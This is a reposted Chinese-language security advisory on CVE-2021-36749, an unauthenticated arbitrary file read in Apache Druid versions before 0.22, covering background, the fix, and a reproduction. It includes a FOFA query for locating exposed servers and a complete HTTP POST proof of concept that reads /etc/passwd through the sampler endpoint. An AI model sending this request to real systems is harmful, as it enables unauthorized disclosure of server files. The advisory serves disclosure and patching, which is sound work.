【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

admin 2023年5月18日10:17:45评论40 views字数 2015阅读6分43秒阅读模式
1

事件背景


近日,Apache Druid 任意文件读取漏洞细节及 EXP 在互联网公开,攻击者可通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可构造恶意请求,在未授权情况下利用该漏洞读取系统任意文件,最终导致服务器敏感信息泄露。

此次受影响 Apache Druid 版本如下:
Apache  Druid版本
是否受影响
Version < 0.22
Version >=0.22
2

漏洞概况

Apache Druid 是一个实时分析型数据库,旨在对大型数据集进行快速的查询分析。Druid 最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端 API,Druid 最适合应用于面向事件类型的数据。

在 Apache Druid 系统中,InputSource 用于从某个数据源读取数据。由于没有对用户可控的 HTTP InputSource 做限制,Apache Druid 允许经过身份验证的用户以 Druid 服务器进程的权限从指定数据源读取数据,包括本地文件系统。攻击者可通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下缺乏授权认证,攻击者可构造恶意请求,在未授权情况下利用该漏洞读取任意文件,最终导致服务器敏感信息泄露。


3

修复方案

官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本,或设置访问权限!

相关官方最新版本下载地址如下:

https://www.apache.org/dyn/closer.cgi?path=/druid/0.22.0/apache-druid-0.22.0-bin.tar.gz

4

漏洞复现


0x00 漏洞详情

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

0x01 fofa语法

title="Apache Druid"

【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

0x02 漏洞复现

主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读取)

【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

file:///etc/passwd


0x03 POC

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1Host: 127.0.0.1:8888Content-Length: 413Accept: application/json, text/plain, */*Origin: http://127.0.0.1:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/json;charset=UTF-8Referer: http://127.0.0.1:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}


【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞


声明


本公众号部分资源来源于网络,版权归原作者或者来源机构所有,如果有涉及任何版权方面的问题,请与及时与我们联系,我们将尽快妥善处理!


谢谢关注↓↓↓

【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

V安全资讯-为网络安全保驾护航


原文始发于微信公众号(V安全资讯):【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月18日10:17:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞预警】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞http://cn-sec.com/archives/642182.html

发表评论

匿名网友 填写信息